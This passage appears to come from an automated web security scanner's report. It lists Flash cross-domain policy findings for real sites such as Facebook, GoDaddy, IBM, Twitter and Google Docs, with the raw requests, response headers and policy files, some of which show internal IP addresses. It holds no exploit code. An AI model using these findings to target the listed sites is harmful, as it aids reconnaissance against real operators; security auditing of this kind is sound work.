Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Wed, 01 Sep 2010 16:56:47 GMT
ETag: "67b2ba4-120-48f359541d1c0"
Accept-Ranges: bytes
Content-Length: 288
Cache-Control: max-age=1209600
Expires: Thu, 19 May 2011 10:56:30 GMT
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

6.117. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.76.43
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.118. https://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.90.127
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.119. http://www.ft.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Thu, 05 May 2011 10:57:11 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

6.120. https://www.godaddy.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

6.121. http://www.ibm.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ibm.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:38 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 01 Nov 2008 20:30:18 GMT
ETag: "153-95044a80"
Accept-Ranges: bytes
Content-Length: 339
epKe-Alive: timeout=10, max=8
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- $Id: crossdomain.xml,v 1.3 2008/08/08 15:47:24 krusch Ex
...[SNIP]...
<allow-access-from domain="*.ibm.com" />
<allow-access-from domain="*.lotus.com" />
...[SNIP]...

6.122. http://www.marketwatch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marketwatch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 04 Nov 2010 12:22:38 GMT
Accept-Ranges: bytes
ETag: "07be2f71a7ccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp04
Date: Thu, 05 May 2011 10:58:41 GMT
Connection: keep-alive
Content-Length: 1625

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.marketwatch.com" />
<allow-access-from domain="*.mktw.net" />
<allow-access-from domain="creatives.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net"/>
<allow-access-from domain="m.doubleclick.net"/>
<allow-access-from domain="m2.doubleclick.net"/>
<allow-access-from domain="m3.doubleclick.net"/>
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="betadfa.doubleclick.net"/>
<allow-access-from domain="dfa.doubleclick.net"/>
<allow-access-from domain="motifcdn2.doubleclick.net"/>
<allow-access-from domain="ad.doubleclick.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.allthingsd.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="*.wsj.net"/>
<allow-access-from domain="*.dowjones.net"/>
<allow-access-from domain="*.llnwd.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.wsjradio.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="aes.online.edit.dowjones.net"/>
<allow-access-from domain="api.bizographics.com"/>
...[SNIP]...

6.123. http://www.mmafighting.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mmafighting.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 1400
Keep-Alive: timeout=5, max=999791
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy><allow-access-from domain="*.aol.com"/><allow-access-from domain="*.digitalcity.com"/><allow-access-from domain="*.aolcdn.com"/><allow-access-from domain="cdn-startpage.aol.com"/><allow-access-from domain="startpage.aol.com"/><allow-access-from domain="*.channels.aol.com"/><allow-access-from domain="*.channel.aol.com"/><allow-access-from domain="*.web.aol.com"/><allow-access-from domain="*.my.aol.com"/><allow-access-from domain="*.news.aol.com"/><allow-access-from domain="iamalpha.com"/><allow-access-from domain="imakealpha.com"/><allow-access-from domain="aimcreate.mdat.aim.com:30100 "/><allow-access-from domain="*.spinner.com"/><allow-access-from domain="*.popeater.com"/><allow-access-from domain="*.theboombox.com"/><allow-access-from domain="*.opticalcortex.com"/><allow-access-from domain="static.stats.com"/><allow-access-from domain="*.moviefone.com"/><allow-access-from domain="*.aolhealth.com"/><allow-access-from domain="*.walletpop.com"/><allow-access-from domain="*.stats.com"/><allow-access-from domain="*.lightningcast.com"/><allow-access-from domain="*.yourminis.com"/><allow-access-from domain="*.fanhouse.com"/><allow-access-from domain="*.blogsmithmedia.com"/><allow-access-from domain="*.beta.fanhouse.com"/>
...[SNIP]...

6.124. http://www.moviefone.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moviefone.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:49 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

6.125. http://www.netvibes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netvibes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netvibes.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 05 May 2011 10:58:52 GMT
Content-Type: text/xml
Connection: close
X-Men: 52
Accept-Ranges: bytes
Last-Modified: Wed, 27 May 2009 07:32:50 GMT
Content-Length: 211
X-slb: 1
X-Jobs: http://about.netvibes.com/jobs.php looking for a sysadmin :)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.meebo.com" />
</cross-dom
...[SNIP]...

6.126. http://www.pageflakes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pageflakes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 266
Content-Type: text/xml
Last-Modified: Sat, 30 Aug 2008 02:30:03 GMT
Accept-Ranges: bytes
ETag: "462324f48ac91:430e2"
Server: Microsoft-IIS/6.0
From: web10
Date: Thu, 05 May 2011 10:58:53 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pageflakes.com"/>
<allow-access-from domain="*.livevideo.com"/>
<allow-access-from domain="*.meandmypage.com"/>
<allow-access-from domain="*.solesite.com"/>
...[SNIP]...

6.127. http://www.popeater.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popeater.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

6.128. http://www.realtytrac.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.realtytrac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realtytrac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Fri, 09 Oct 2020 00:00:00 GMT
Last-Modified: Fri, 21 May 2010 19:20:10 GMT
Accept-Ranges: bytes
ETag: "011ea11af9ca1:0"
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml",CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Thu, 05 May 2011 01:00:22 GMT
Connection: close
Content-Length: 170

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.realtytrac.com" />
   <allow-access-from domain="*.erealinvestor.com" />
</cross-domain-policy>

6.129. http://www.tuaw.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tuaw.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

6.130. http://aolmobile.aol.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aolmobile.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: aolmobile.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:29 GMT
Server: Apache
Last-Modified: Tue, 10 Oct 2006 19:00:19 GMT
Accept-Ranges: bytes
Content-Length: 404
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.goldrush.aol.com" to-ports="80"/>
<allow-access-from domain="goldrush.aol.com" to-ports="80"/>
<allow-access-from domain="goldrush-gslbtest.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="cdn.digitalcity.com" to-ports="80"/>
...[SNIP]...

6.131. http://aolmobile.aolcdn.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aolmobile.aolcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: aolmobile.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 10 Oct 2006 19:00:19 GMT
Accept-Ranges: bytes
Content-Length: 404
Content-Type: application/xml
Date: Thu, 05 May 2011 13:00:46 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.goldrush.aol.com" to-ports="80"/>
<allow-access-from domain="goldrush.aol.com" to-ports="80"/>
<allow-access-from domain="goldrush-gslbtest.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="cdn.digitalcity.com" to-ports="80"/>
...[SNIP]...

6.132. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:50:29 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Content-Type: application/xml
Content-Length: 561
Set-Cookie: k=173.193.214.243.1304599829120472; path=/; expires=Thu, 12-May-11 12:50:29 GMT; domain=.twitter.com
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 13:20:29 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.133. http://citi.bridgetrack.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: citi.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 508
Content-Type: text/html
Server:
Date: Thu, 05 May 2011 00:59:03 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
   <allow-access-from domain="www.sapientprojects.com" />
...[SNIP]...

6.134. http://docs.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Fri, 06 May 2011 02:51:49 GMT
Date: Thu, 05 May 2011 02:51:49 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 28868

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.135. http://s.stats.wordpress.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.stats.wordpress.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Thu, 05 May 2011 00:59:31 GMT
Last-Modified: Mon, 14 Mar 2011 18:45:46 GMT
Server: nginx
Content-Length: 585
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

6.136. http://static.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:49:48 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1304599788607212; path=/; expires=Thu, 12-May-11 12:49:48 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 13:19:48 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
   <allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
...[SNIP]...

6.137. http://stats.wordpress.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
